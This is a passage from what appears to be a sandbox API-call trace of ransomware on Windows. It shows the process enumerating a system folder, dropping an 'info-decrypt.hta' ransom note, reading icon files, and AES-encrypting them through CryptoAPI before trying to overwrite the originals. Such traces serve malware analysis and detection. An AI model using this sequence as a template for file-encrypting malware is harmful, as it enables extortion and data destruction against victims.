returned 0xbe15e8 [0153.571] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.571] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0153.571] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0153.571] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2db04ce, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2db04ce, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5b43, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2ca5b43, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c10f535, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c59889, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c59889, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1cdc0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cf1dfd, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2cf1dfd, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d17f5a, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d17f5a, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d3e0b7, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d3e0b7, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0153.572] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c219ec7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x7c219ec7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0153.573] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0153.573] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.573] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0153.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0153.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0153.574] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpFilePart=0x0) returned 0x51 [0153.574] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpFilePart=0x0) returned 0x52 [0153.574] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.575] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.576] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0153.576] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0153.576] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2db04ce, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2db04ce, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0153.576] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ca5b43, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2ca5b43, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c10f535, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0153.576] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c59889, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c59889, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1cdc0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cf1dfd, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2cf1dfd, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d17f5a, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d17f5a, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d3e0b7, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d3e0b7, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c219ec7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x7c219ec7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0153.577] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0153.578] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0153.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0153.579] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpFilePart=0x0) returned 0x5c [0153.579] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0153.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0153.579] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0153.580] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpFilePart=0x0) returned 0x5c [0153.580] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eca8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0153.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f19c) returned 1 [0153.580] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0153.581] GetFileType (hFile=0x45c) returned 0x1 [0153.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f198) returned 1 [0153.581] GetFileType (hFile=0x45c) returned 0x1 [0153.581] WriteFile (in: hFile=0x45c, lpBuffer=0x3726e04*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f260, lpOverlapped=0x0 | out: lpBuffer=0x3726e04*, lpNumberOfBytesWritten=0x691f260*=0x1000, lpOverlapped=0x0) returned 1 [0153.582] WriteFile (in: hFile=0x45c, lpBuffer=0x3726e04*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f234, lpOverlapped=0x0 | out: lpBuffer=0x3726e04*, lpNumberOfBytesWritten=0x691f234*=0x55e, lpOverlapped=0x0) returned 1 [0153.583] CloseHandle (hObject=0x45c) returned 1 [0153.583] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpFilePart=0x0) returned 0x5c [0153.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0153.583] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), fInfoLevelId=0x0, lpFileInformation=0x3727e20 | out: lpFileInformation=0x3727e20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3)) returned 1 [0154.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0154.942] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpFilePart=0x0) returned 0x5c [0154.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0154.942] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0154.942] GetFileType (hFile=0x428) returned 0x1 [0154.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0154.942] GetFileType (hFile=0x428) returned 0x1 [0154.942] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xd0a3 [0154.943] ReadFile (in: hFile=0x428, lpBuffer=0x39661f4, nNumberOfBytesToRead=0xd0a3, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x39661f4*, lpNumberOfBytesRead=0x691f29c*=0xd0a3, lpOverlapped=0x0) returned 1 [0154.945] CloseHandle (hObject=0x428) returned 1 [0154.945] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdff20) returned 1 [0154.946] CryptGenRandom (in: hProv=0xbdff20, dwLen=0x10, pbBuffer=0x397395c | out: pbBuffer=0x397395c) returned 1 [0155.428] CryptImportKey (in: hProv=0xbdff20, pbData=0x35d1804, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fd10) returned 1 [0155.428] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.428] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.428] CryptDuplicateKey (in: hKey=0xb7fd10, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f490) returned 1 [0155.428] CryptContextAddRef (hProv=0xbdff20, pdwReserved=0x0, dwFlags=0x0) returned 1 [0155.428] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x35d18e4*=0x1, dwFlags=0x0) returned 1 [0155.428] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x35d18b0, dwFlags=0x0) returned 1 [0155.429] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35d18f4*, pdwDataLen=0x691f268*=0xd0b0, dwBufLen=0xd0b0 | out: pbData=0x35d18f4*, pdwDataLen=0x691f268*=0xd0b0) returned 1 [0155.429] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35de9c8*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x35de9c8*, pdwDataLen=0x691f270*=0x10) returned 1 [0155.431] CryptDestroyKey (hKey=0xb7fd10) returned 1 [0155.431] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0155.431] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0155.431] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpFilePart=0x0) returned 0x5c [0155.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0155.431] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0155.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0155.433] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpFilePart=0x0) returned 0x5c [0155.433] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0155.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0155.433] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1937e180, ftCreationTime.dwHighDateTime=0x1d68bad, 